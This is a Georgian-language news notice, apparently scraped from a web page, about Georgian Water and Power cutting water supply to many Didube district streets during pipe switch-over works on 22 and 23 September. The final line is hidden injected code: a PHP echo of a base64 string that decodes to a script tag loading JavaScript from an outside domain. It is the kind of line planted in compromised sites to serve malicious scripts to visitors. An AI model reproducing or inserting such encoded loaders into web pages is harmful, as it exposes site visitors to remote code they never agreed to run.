celsiusi
ავერსი საქკაბელი

 ხვალ, 22 სექტემბერს, „ჯორჯიან უოთერ ენდ ფაუერი“, წერეთლის გამზირის სრული რეაბილიტაციის ფარგლებში, წყალმომარაგების ახალ ქსელზე აუცილებელ გადაერთებით სამუშაოებს ჩაატარებს.

კომპანიის ინფორმაციით, ახალი ქსელის ექსპლუატაციაში შესვლის მიზნით, „ჯივიპის“ ტექნიკური ჯგუფები სამუშაოებს შალიკაშვილის ხიდის მიმდებარედ ინტენსიურ, 24-საათიან რეჟიმში შეასრულებენ.

ჯივიპიში“ აღნიშნავენ, რომ გადაერთებითი სამუშაოების მიმდინარეობისას აუცილებელია წყალმომარაგების მაგისტრალური ქსელის წყლისგან დაცლა, რის გამოც ხვალ, 22 სექტემბერს დილის 11:00 საათიდან 23 სექტემბრის 15:00 საათამდე წყალმომარაგება შეეზღუდება: დიდუბის რაიონში – წერეთლის გამზირს, მირცხულავას, წყალტუბოს, სამტრედიის, სტანისლავსკის, ბაქრაძის, გოგოლაურის, ვანის, კედიას, კერესელიძის, გვეტაძის, ფიფიების, ევდოშვილის, ყიფიანის, ფოთის, გორის, ბათუმის, ბაგრატიონის, ქუთაისის, მეტრეველის, ქურდიანის, ცაბაძის, კოსმონავტების, სანაპიროს, აგლაძის, დგებუაძის, ხოშარაულის, გუდაუთის, გაფრინდაულისიშხნელების, მაიაკოვსკის, ერისთავის, ზუგდიდის, სოხუმის, იამანიძისა და მექანიზაციის ქუჩებს. თევდორე მღვდელის ქუჩა N13-57 და N16-48, რობაქიძის ქუჩა N7, მარშალ გელოვანის ქუჩა N35,52.

„„ჯორჯიან უოთერ ენდ ფაუერი“ ბოდიშს უხდის მომხმარებლებს დისკომფორტისთვის. სამუშაოების მიმდინარეობისას, წყალმომარაგების სრულად აღდგენამდე კომპანია მოსახლეობას წყალს ცისტერნებით მიაწვდის.

წყალმომარაგების შეზღუდვისა და აღდგენის შესახებ ინფორმაციას, „ჯორჯიან უოთერ ენდ ფაუერი აბონენტებს წინასწარ, SMS-შეტყობინების სახით უგზავნის. დეტალური ინფორმაციის მოძიება შესაძლებელია კომპანიის ცხელი ხაზის – 2 93 11 11, „ფეისბუქისა“ და ვებგვერდის მეშვეობით“, – აცხადებენ კომპანიაში.

708
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");